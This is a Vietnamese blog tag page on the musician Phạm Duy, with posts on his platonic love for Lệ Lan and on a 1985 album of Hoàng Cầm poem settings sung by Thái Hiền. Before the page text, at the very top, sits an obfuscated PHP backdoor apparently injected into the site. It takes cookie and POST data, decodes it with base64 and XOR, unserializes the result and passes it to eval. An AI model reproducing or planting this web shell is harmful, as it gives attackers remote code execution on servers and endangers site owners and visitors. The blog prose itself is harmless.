$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> phạm-duy – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: phạm-duy

Chỉ chừng đó thôi

Ngày đó Phạm Duy yêu Helene, một cô gái ngoại quốc. Helene sống ở Sài Gòn cùng con gái mình là Alice. Ngày xưa khi còn quen biết và tới nhà Helene, Alice còn bé xíu, thế mà bẵng đi vài chục năm sau gặp lại, Alice đã trở thành một thiếu nữ xinh đẹp. Phạm Duy và Alice phải lòng nhau.

Phạm Duy ngày đó chả vừa, là một người đam mê nhục dục xác thịt (điều này chính ông thừa nhận), nhưng mối tình với Alice là mối tình ông gọi là “mối tình đồng trinh duy nhất” – cả hai chỉ yêu nhau qua tâm hồn, không có bất cứ liên hệ gì về thể xác. Đây có thể xem là một trong những mối tình thơ nhạc đẹp nhất của nền văn học nghệ thuật miền Nam trước giải phóng. Trong rất nhiều bài nhạc của mình, Phạm Duy đều có đề tặng Lệ Lan, sau này mọi người mới biết đó là tên Việt của Alice. Alice cũng viết tặng Phạm Duy tới gần 300 bài thơ, rất nhiều trong đó được ông phổ nhạc.

Trước khi đi lấy chồng, Lệ Lan đã gửi cho nhạc sỹ Phạm Duy một bức thư. Trong đó bà viết: “Mười năm, quá đủ cho một mối tình đẹp và một đời người ngắn ngủi…(…)…Từ đây đến ngày cưới có thể L. sẽ xin gặp chú một, hai lần nữa. Chẳng để làm gì cả. L. chắc chú cũng nghĩ như L. Chẳng có gì bi thảm. Chẳng có gì tiếc hận. Một mối tình đẹp kết thúc một cách êm ái. L. chỉ xin giữ lại một chút dư hương để truyền lại cho các con của L. sau này cho chúng nó cũng có một tâm hồn biết yêu thương đằm thắm”.

Như Phạm Duy sau này về già hồi tưởng, thì có tới hơn 40 bài nhạc của ông lấy Lệ Lan làm cảm hứng, trong đó tiêu biểu nhất là 3 bài:
– Ngày ấy chúng mình – đánh dấu thời điểm yêu nhau
– Nghìn trùng xa cách – đánh dấu thời điểm xa nhau
– Chỉ chừng ấy thôi – đánh dấu thời điểm ông quyết định quên Lệ Lan

—————–

À, sẵn tiện đang nghe “Chỉ Chừng Ấy Thôi” nên viết,

Chỉ cần một cơn mưa
Là vai gầy thêm nữa
Cho ướt môi, mềm da
Chỉ cần giọt mưa sa

Chỉ chờ một cơn mưa
Để không ngờ chi nữa
Đi dưới mưa hồng nghe
Giọt nhẹ vào tim ta.

For M, M sống tốt nhé.

Lá Diêu Bông – Thông Điệp Mùa Xuân – Phạm Duy 1985

Nhân đọc lại “Bên kia Sông Đuống” – một trong những bài thơ hiếm hoi học ở bậc phổ thông trung học mà tới giờ mình vẫn còn nhớ lời, mình nghĩ tới album này, loay hoay tìm nghe lại và viết vài dòng.

Thơ Hoàng Cầm – oanh vàng Kinh Bắc, rất hay, nhưng chả hiểu sao không mấy nhạc sĩ đem mấy bài thơ của ông vào nhạc. Mình đoán là vì khó, thơ Hoàng Cầm dễ đọc, dễ hiểu với thi từ và ý thơ đơn giản, nhưng để chuyển tải cái mộc mạc giản đơn, nhẹ nhàng mà tinh tế ấy vào nhạc thì chắc khó. Có lẽ nhạc sĩ Phạm Duy là người hiếm hoi (hoặc duy nhất – correct me if i’m wrong) phổ thơ Hoàng Cầm.

Trong những cuốn hồi kí và các cuộc phỏng vấn của mình, Phạm Duy luôn khen ngợi và đánh giá Hoàng Cầm rất cao, từ nhân cách tới lãnh vực nghệ thuật. Phạm Duy thân với Hoàng Cầm từ hồi trên chiến khu Cao – Bắc – Lạng. Chính Phạm Duy cũng thừa nhận rằng ông chịu ảnh hưởng tình yêu nước từ Hoàng Cầm rất nhiều. Phạm Duy đã từng phổ thơ khá nhiều bài của thi sĩ Hoàng Cầm và được đông đảo thính giả yêu mến.

Lại nói về album này, album này được phát hành ở hải ngoại vào năm 1985, chủ yếu là các ca khúc của Hoàng Cầm, có xen vào vài ca khúc khác, như bài “Màu thời gian” thơ Đoàn Phú Tứ, hay hai bài sặc mùi ‘chống Cộng’ do Phạm Duy viết. Album do nhạc sĩ hòa âm phối khí được xem như là hay nhất hải ngoại, cũng là con ruột của Phạm Duy thực hiện. Ca sĩ trình bày bài hát này là Thái Hiền, cũng là con gái của Phạm Duy.

Đã nhắc đến thì lại phải nói tiếp, trong số các người con hay những người có liên quan trong đại gia đình Phạm Duy, thì Thái Hiền không được biết đến nhiều lắm. Ở làng nhạc hải ngoại, cái tên Thái Hiền cũng không nổi bật. Nhưng điều đó không có nghĩa Thái Hiền hát không hay. Mình thích Thái Hiền còn hơn thích cả Ý Lan. Thái Hiền sống khá nội tâm, khép kín, cô không đi show hay trình diễn ở các chương trình nhạc hội của Paris By Night hay Asia. Cô không có cái giọng kim cao đến chói xoáy thẳng vào óc người nghe như người dì là Thái Thanh, không có cái vẻ yểu điệu gió thổi mây bay như của người em họ Ý Lan, giọng của Thái Hiền nhẹ nhàng và thanh khiết hệt như tính cách của cô.

Lấy như bài “Lá diêu bông”. Bài này hát thành công nhất là Ý Lan, hát đúng cái chất ỡm ờ nửa khiêu khích nửa e thẹn của người con gái kinh Bắc. Lúc nghe Ý Lan chỉ cứ nghĩ ngoài Ý Lan ra không ai trình bày đạt hơn được nữa. Nghe lại Thái Hiền mới thấy khác. Dĩ nhiên cả 2 version đều mười phân vẹn mười. Ở Thái Hiền không đạt được chất ‘lẳng’ như khi Ý Lan hát, nhưng có cảm giác mộc mạc và nhẹ nhàng, như đúng một câu chuyện say nắng của những chàng trai nông thôn ngày đó – yêu rồi phải quên, giản đơn như vốn nó là thế.

Hay như bài “Cỗ bài tam cúc” (Cây tam cúc – Hoàng Cầm), tới câu:

Em đừng lớn nữa chị đừng đi

Nghe Thái Hiền hát yêu không chịu nổi.

Nếu có điểm mình không vừa ý với album này thì đó là nhạc sĩ Phạm Duy nói quá nhiều, nếu bỏ bớt đi những lời ông tỉ tê nói, cùng 2 bài ‘chống Cộng’ thêm vào cuối album thì có thể với mình sẽ là album tuyệt vời. Thôi đành chép miệng vừa chuyển bài thì kéo cho forward khúc đầu vậy. Giọng Thái Hiền quá hay, đang nghe lại lần nữa tới câu

Trăm năm tình cũ lìa không hận
Thà khép mày hoa, thiếp phụ chàng

Lại không nhịn nổi mà vỗ đùi đánh đét một cái.

À, nghe thì nên nghe thêm bài “Bên kia sông Đuống” mà Phạm Duy phổ thơ năm 2010, do Mỹ Linh trình bày, để hoàn toàn đắm chìm vào không khí nhạc Phạm Duy – thơ Hoàng Cầm trọn vẹn nhất…

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.